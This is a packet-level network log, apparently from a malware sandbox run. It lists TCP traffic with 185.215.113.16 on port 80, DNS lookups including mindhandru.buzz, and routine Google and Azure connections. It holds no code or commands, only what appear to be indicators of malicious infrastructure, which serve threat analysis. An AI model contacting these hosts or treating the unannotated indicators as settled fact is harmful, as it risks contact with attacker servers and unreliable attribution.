Dec 26, 2024 12:41:49.850423098 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:49.851152897 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:49.851202011 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:50.016016960 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.016145945 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.016292095 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:50.016462088 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.016588926 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.016633987 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:50.017115116 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.017175913 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.017709017 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:50.017978907 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.018075943 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.018122911 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:50.018870115 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.018970013 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.019290924 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:50.019764900 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.019854069 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.020673037 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:50.020766973 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.020889997 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.020936012 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:50.021506071 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.021600962 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.021919966 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:50.022397041 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.022519112 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.022566080 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:50.023282051 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.023408890 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.023466110 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:50.024128914 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.024251938 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.024315119 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:50.025043011 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.025160074 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.025208950 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:50.025865078 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.025954008 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.026117086 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:50.026784897 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.026849985 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.026915073 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:50.027627945 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.027751923 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.027810097 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:50.028501034 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.028628111 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.028676033 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:50.029409885 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.029470921 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.030257940 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.030313015 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:50.030354023 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.031003952 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:50.031125069 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.031229973 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.031281948 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:50.032080889 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.032156944 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.032207012 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:50.032989025 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.033119917 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.034169912 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.034230947 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:50.034401894 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.035053968 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.035115957 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:50.035136938 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.035765886 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.035830975 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:50.035871983 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.036499977 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.036550045 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:50.036555052 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.036598921 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:50.037358046 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.037477970 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.037556887 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:50.038175106 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.038271904 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.038331985 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:50.039053917 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.039184093 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.039230108 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:50.040034056 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.040131092 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.040829897 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.040890932 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:50.040977955 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.041651964 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.041704893 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:50.041763067 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.041809082 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:50.042532921 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.042629957 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.042684078 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:50.043446064 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.043576002 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.043644905 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:50.044281960 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.044420958 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.044467926 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:50.045176983 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.045288086 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.046047926 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.046094894 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:50.046149015 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.046938896 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.046983957 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:50.047076941 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.047828913 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.047902107 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:50.047933102 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.047976971 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:50.048664093 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.048758030 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.048804045 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:50.049751997 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.049843073 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.049887896 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:50.050419092 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.050512075 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.050556898 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:50.051342964 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.051382065 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.051423073 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:50.052294016 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.052397013 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.053385973 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.053445101 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:50.053450108 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.053656101 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:50.053925037 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.054027081 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.054075003 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:50.054784060 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.054888010 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.054943085 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:50.055871964 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.056160927 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.056217909 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:50.057248116 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.057384014 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.057455063 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:50.057974100 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.058057070 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.058463097 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.058482885 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.058545113 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:50.058561087 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:50.059145927 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.059206009 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.059250116 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:50.060000896 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.060091972 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.060142040 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:50.061208010 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.061321974 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.061899900 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.061953068 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:50.226845980 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.226989031 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.227077961 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:50.227263927 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.227360010 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.227433920 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:50.228121042 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.228208065 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.228589058 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:50.228996992 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.229094982 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.229142904 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:50.229902983 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.229960918 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.230577946 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:50.230748892 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.230830908 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.231151104 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:50.231631994 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.231755972 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.231802940 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:50.232542038 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.232671976 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.232749939 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:50.233371019 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.233469963 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.233798027 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:50.234262943 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.234343052 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.234411955 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:50.235146046 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.235203028 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.235260963 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:50.235984087 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.236114025 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.236160040 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:50.236886978 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.236948967 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.237124920 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:50.237700939 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:50.278156042 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:59.089498997 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:42:00.292901039 CET	49814	443	192.168.2.7	172.217.21.36
Dec 26, 2024 12:42:00.292939901 CET	443	49814	172.217.21.36	192.168.2.7
Dec 26, 2024 12:42:00.293061972 CET	49814	443	192.168.2.7	172.217.21.36
Dec 26, 2024 12:42:00.293275118 CET	49814	443	192.168.2.7	172.217.21.36
Dec 26, 2024 12:42:00.293287039 CET	443	49814	172.217.21.36	192.168.2.7
Dec 26, 2024 12:42:02.080841064 CET	443	49814	172.217.21.36	192.168.2.7
Dec 26, 2024 12:42:02.081325054 CET	49814	443	192.168.2.7	172.217.21.36
Dec 26, 2024 12:42:02.081346989 CET	443	49814	172.217.21.36	192.168.2.7
Dec 26, 2024 12:42:02.082781076 CET	443	49814	172.217.21.36	192.168.2.7
Dec 26, 2024 12:42:02.082859039 CET	49814	443	192.168.2.7	172.217.21.36
Dec 26, 2024 12:42:02.083858013 CET	49814	443	192.168.2.7	172.217.21.36
Dec 26, 2024 12:42:02.083998919 CET	443	49814	172.217.21.36	192.168.2.7
Dec 26, 2024 12:42:02.138839960 CET	49814	443	192.168.2.7	172.217.21.36
Dec 26, 2024 12:42:02.138851881 CET	443	49814	172.217.21.36	192.168.2.7
Dec 26, 2024 12:42:02.184439898 CET	49814	443	192.168.2.7	172.217.21.36
Dec 26, 2024 12:42:11.754509926 CET	443	49814	172.217.21.36	192.168.2.7
Dec 26, 2024 12:42:11.754585028 CET	443	49814	172.217.21.36	192.168.2.7
Dec 26, 2024 12:42:11.754864931 CET	49814	443	192.168.2.7	172.217.21.36
Dec 26, 2024 12:42:12.027874947 CET	49814	443	192.168.2.7	172.217.21.36
Dec 26, 2024 12:42:12.027894974 CET	443	49814	172.217.21.36	192.168.2.7
Dec 26, 2024 12:42:20.209523916 CET	443	49745	104.98.116.138	192.168.2.7
Dec 26, 2024 12:42:20.209604025 CET	49745	443	192.168.2.7	104.98.116.138
Dec 26, 2024 12:43:00.217751980 CET	50025	443	192.168.2.7	172.217.21.36
Dec 26, 2024 12:43:00.217833996 CET	443	50025	172.217.21.36	192.168.2.7
Dec 26, 2024 12:43:00.217937946 CET	50025	443	192.168.2.7	172.217.21.36
Dec 26, 2024 12:43:00.218220949 CET	50025	443	192.168.2.7	172.217.21.36
Dec 26, 2024 12:43:00.218255997 CET	443	50025	172.217.21.36	192.168.2.7
Dec 26, 2024 12:43:02.000219107 CET	443	50025	172.217.21.36	192.168.2.7
Dec 26, 2024 12:43:02.007437944 CET	50025	443	192.168.2.7	172.217.21.36
Dec 26, 2024 12:43:02.007530928 CET	443	50025	172.217.21.36	192.168.2.7
Dec 26, 2024 12:43:02.008090973 CET	443	50025	172.217.21.36	192.168.2.7
Dec 26, 2024 12:43:02.008461952 CET	50025	443	192.168.2.7	172.217.21.36
Dec 26, 2024 12:43:02.008564949 CET	443	50025	172.217.21.36	192.168.2.7
Dec 26, 2024 12:43:02.059959888 CET	50025	443	192.168.2.7	172.217.21.36
Dec 26, 2024 12:43:11.685941935 CET	443	50025	172.217.21.36	192.168.2.7
Dec 26, 2024 12:43:11.686131954 CET	443	50025	172.217.21.36	192.168.2.7
Dec 26, 2024 12:43:11.686222076 CET	50025	443	192.168.2.7	172.217.21.36
Dec 26, 2024 12:43:12.882314920 CET	50025	443	192.168.2.7	172.217.21.36
Dec 26, 2024 12:43:12.882340908 CET	443	50025	172.217.21.36	192.168.2.7

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 26, 2024 12:41:17.652038097 CET	123	123	192.168.2.7	40.81.94.65
Dec 26, 2024 12:41:18.229708910 CET	123	123	40.81.94.65	192.168.2.7
Dec 26, 2024 12:41:21.152787924 CET	58826	53	192.168.2.7	1.1.1.1
Dec 26, 2024 12:41:21.290384054 CET	53	58826	1.1.1.1	192.168.2.7
Dec 26, 2024 12:41:56.111248016 CET	53	58765	1.1.1.1	192.168.2.7
Dec 26, 2024 12:41:59.302217007 CET	53	52031	1.1.1.1	192.168.2.7
Dec 26, 2024 12:42:00.154073000 CET	55430	53	192.168.2.7	1.1.1.1
Dec 26, 2024 12:42:00.154254913 CET	51986	53	192.168.2.7	1.1.1.1
Dec 26, 2024 12:42:00.291004896 CET	53	55430	1.1.1.1	192.168.2.7
Dec 26, 2024 12:42:00.291743994 CET	53	51986	1.1.1.1	192.168.2.7
Dec 26, 2024 12:42:02.722480059 CET	50949	53	192.168.2.7	1.1.1.1
Dec 26, 2024 12:42:02.722749949 CET	56241	53	192.168.2.7	1.1.1.1
Dec 26, 2024 12:42:06.011089087 CET	51453	53	192.168.2.7	1.1.1.1
Dec 26, 2024 12:42:06.011331081 CET	54965	53	192.168.2.7	1.1.1.1
Dec 26, 2024 12:42:10.888650894 CET	53	57013	1.1.1.1	192.168.2.7
Dec 26, 2024 12:42:11.683948040 CET	138	138	192.168.2.7	192.168.2.255
Dec 26, 2024 12:42:12.774668932 CET	55641	53	192.168.2.7	1.1.1.1
Dec 26, 2024 12:42:12.774905920 CET	50335	53	192.168.2.7	1.1.1.1
Dec 26, 2024 12:42:16.447746038 CET	53	63528	1.1.1.1	192.168.2.7
Dec 26, 2024 12:42:35.386291027 CET	53	55723	1.1.1.1	192.168.2.7
Dec 26, 2024 12:42:55.561727047 CET	53	51937	1.1.1.1	192.168.2.7
Dec 26, 2024 12:42:58.022303104 CET	53	50743	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 26, 2024 12:41:21.152787924 CET	192.168.2.7	1.1.1.1	0x3f19	Standard query (0)	mindhandru.buzz	A (IP address)	IN (0x0001)	false
Dec 26, 2024 12:42:00.154073000 CET	192.168.2.7	1.1.1.1	0xc598	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Dec 26, 2024 12:42:00.154254913 CET	192.168.2.7	1.1.1.1	0x6aa7	Standard query (0)	www.google.com	65	IN (0x0001)	false
Dec 26, 2024 12:42:02.722480059 CET	192.168.2.7	1.1.1.1	0xe9a8	Standard query (0)	js.monitor.azure.com	A (IP address)	IN (0x0001)	false
Dec 26, 2024 12:42:02.722749949 CET	192.168.2.7	1.1.1.1	0x8260	Standard query (0)	js.monitor.azure.com	65	IN (0x0001)	false
Dec 26, 2024 12:42:06.011089087 CET	192.168.2.7	1.1.1.1	0xedb	Standard query (0)	js.monitor.azure.com	A (IP address)	IN (0x0001)	false
Dec 26, 2024 12:42:06.011331081 CET	192.168.2.7	1.1.1.1	0xecc9	Standard query (0)	js.monitor.azure.com	65	IN (0x0001)	false
Dec 26, 2024 12:42:12.774668932 CET	192.168.2.7	1.1.1.1	0x9a6d	Standard query (0)	mdec.nelreports.net	A (IP address)	IN (0x0001)	false
Dec 26, 2024 12:42:12.774905920 CET	192.168.2.7	1.1.1.1	0x23e1	Standard query (0)	mdec.nelreports.net	65	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 26, 2024 12:41:16.863584042 CET	1.1.1.1	192.168.2.7	0x47c3	No error (0)	shed.dual-low.s-part-0035.t-0009.t-msedge.net	s-part-0035.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 26, 2024 12:41:16.863584042 CET	1.1.1.1	192.168.2.7	0x47c3	No error (0)	s-part-0035.t-0009.t-msedge.net		13.107.246.63	A (IP address)	IN (0x0001)	false
Dec 26, 2024 12:41:21.290384054 CET	1.1.1.1	192.168.2.7	0x3f19	No error (0)	mindhandru.buzz		172.67.165.185	A (IP address)	IN (0x0001)	false
Dec 26, 2024 12:41:21.290384054 CET	1.1.1.1	192.168.2.7	0x3f19	No error (0)	mindhandru.buzz		104.21.11.101	A (IP address)	IN (0x0001)	false
Dec 26, 2024 12:42:00.291004896 CET	1.1.1.1	192.168.2.7	0xc598	No error (0)	www.google.com		172.217.21.36	A (IP address)	IN (0x0001)	false
Dec 26, 2024 12:42:00.291743994 CET	1.1.1.1	192.168.2.7	0x6aa7	No error (0)	www.google.com			65	IN (0x0001)	false
Dec 26, 2024 12:42:02.859550953 CET	1.1.1.1	192.168.2.7	0x1832	No error (0)	consentdeliveryfd.azurefd.net	firstparty-azurefd-prod.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 26, 2024 12:42:02.860814095 CET	1.1.1.1	192.168.2.7	0x8260	No error (0)	js.monitor.azure.com	aijscdn2-bwfdfxezdubebtb0.z01.azurefd.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 26, 2024 12:42:02.860814095 CET	1.1.1.1	192.168.2.7	0x8260	No error (0)	aijscdn2-bwfdfxezdubebtb0.z01.azurefd.net	star-azurefd-prod.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 26, 2024 12:42:02.863424063 CET	1.1.1.1	192.168.2.7	0x26dd	No error (0)	consentdeliveryfd.azurefd.net	firstparty-azurefd-prod.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 26, 2024 12:42:02.863424063 CET	1.1.1.1	192.168.2.7	0x26dd	No error (0)	shed.dual-low.s-part-0035.t-0009.t-msedge.net	s-part-0035.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 26, 2024 12:42:02.863424063 CET	1.1.1.1	192.168.2.7	0x26dd	No error (0)	s-part-0035.t-0009.t-msedge.net		13.107.246.63	A (IP address)	IN (0x0001)	false
Dec 26, 2024 12:42:02.865375996 CET	1.1.1.1	192.168.2.7	0xe9a8	No error (0)	js.monitor.azure.com	aijscdn2-bwfdfxezdubebtb0.z01.azurefd.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 26, 2024 12:42:02.865375996 CET	1.1.1.1	192.168.2.7	0xe9a8	No error (0)	aijscdn2-bwfdfxezdubebtb0.z01.azurefd.net	star-azurefd-prod.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 26, 2024 12:42:02.865375996 CET	1.1.1.1	192.168.2.7	0xe9a8	No error (0)	shed.dual-low.s-part-0035.t-0009.t-msedge.net	s-part-0035.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 26, 2024 12:42:02.865375996 CET	1.1.1.1	192.168.2.7	0xe9a8	No error (0)	s-part-0035.t-0009.t-msedge.net		13.107.246.63	A (IP address)	IN (0x0001)	false
Dec 26, 2024 12:42:05.894573927 CET	1.1.1.1	192.168.2.7	0x9345	No error (0)	consentdeliveryfd.azurefd.net	firstparty-azurefd-prod.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 26, 2024 12:42:05.894573927 CET	1.1.1.1	192.168.2.7	0x9345	No error (0)	shed.dual-low.s-part-0035.t-0009.t-msedge.net	s-part-0035.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 26, 2024 12:42:05.894573927 CET	1.1.1.1	192.168.2.7	0x9345	No error (0)	s-part-0035.t-0009.t-msedge.net		13.107.246.63	A (IP address)	IN (0x0001)	false
Dec 26, 2024 12:42:05.907238007 CET	1.1.1.1	192.168.2.7	0x3dd0	No error (0)	consentdeliveryfd.azurefd.net	firstparty-azurefd-prod.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 26, 2024 12:42:06.152231932 CET	1.1.1.1	192.168.2.7	0xedb	No error (0)	js.monitor.azure.com	aijscdn2-bwfdfxezdubebtb0.z01.azurefd.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 26, 2024 12:42:06.152231932 CET	1.1.1.1	192.168.2.7	0xedb	No error (0)	aijscdn2-bwfdfxezdubebtb0.z01.azurefd.net	star-azurefd-prod.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
